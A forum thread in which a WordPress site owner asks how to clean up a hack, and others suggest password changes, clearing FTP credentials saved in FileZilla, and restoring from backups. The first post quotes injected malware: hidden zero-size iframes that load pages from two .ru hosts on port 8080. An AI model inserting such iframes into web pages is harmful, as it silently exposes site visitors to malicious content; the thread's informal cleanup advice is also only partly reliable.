this is the second time in a few days that randomly, during the night, without me doing any work to my site, i get the following error message start coming up on www.midweekpolitics.com: Parse error: syntax error, unexpected T_STRING in /home/midweekp/public_html/index.php on line 18 Upon investigation, that line refers to some weird iframe stuff referring to .ru sites that is in the code: <iframe frameborder="0" onload="if (!this.src){ this.src='http://intelq.ru:8080/index.php'; this.height='0'; this.width='0';}" >guujlquemswxeftblmwvmis <iframe frameborder="0" onload="if (!this.src){ this.src='http://iquotient.ru:8080/index.php'; this.height='0'; this.width='0';}" >wfnawqfzjddeigipfjwtmqkliixxndi</iframe> several pages have this in it, including when i go to www.midweekpolitics.com/wp-admin i've changed passwords, and it's a brand new vps, so it's not like it's been around so long with the same password that there are liekly security issues. how would i fix and prevent this? going through and simply removing the iframe lines didnt fix it, so i put the code back exactly how it was and posted here.
Sort the files in your root directory by date and see if there's any newish files that don't belong - or if there's any files that DO belong, but have unusually recent modified date stamps. If you've got a backup of your WP database, it would probably be quicker to just delete everything, change your FTP password, create a NEW db (with a new login/pass) and reimport everything. If you've got backups, it's probably 10 minutes work at the most. Did you change your FTP, MySQL, and Wordpress passwords?
i didn't change all the passwords, that's a good point. if i backup the db now, will it still be an effective backup to restore from, or would it be "tainted" in some way. also: where in wordpress (which file) do i change the mysql password in?
I'd be more likely to trust a (posts only) export from WP admin than a full export of your entire MySQL db. A WP backup might take a bit of noodling to restore (I don't think it saves your comments btw!), but I think it's probably the safer option. wp-config.php Good luck!
Changing passwords is not enough. You need to remove all saved account details & passwords in your FTP client. How To Completely Remove All Malicious Iframes on Your Website Forever
interesting, i do indeed have filezilla with stored access info. i just went in, cleared it, and uninstalled filezilla altogether. what is a safe ftp program to use? a quick google search revealed many ftp programs that do this exact thing.
VIRUS SCAN just found this, which sounds like EXACTLY what would cause this. what should i do? will avg remove these properly? "Detection name";"Virus found HTML/Framer" "Object type";"file" "SDK Type";"Core" "Result";"Infected" "Action history";""
I don't know which software is safe, because the virus attacks not only FileZilla. Looks like AVG can't remove it. Anyway, just don't save password and I think it will be fine.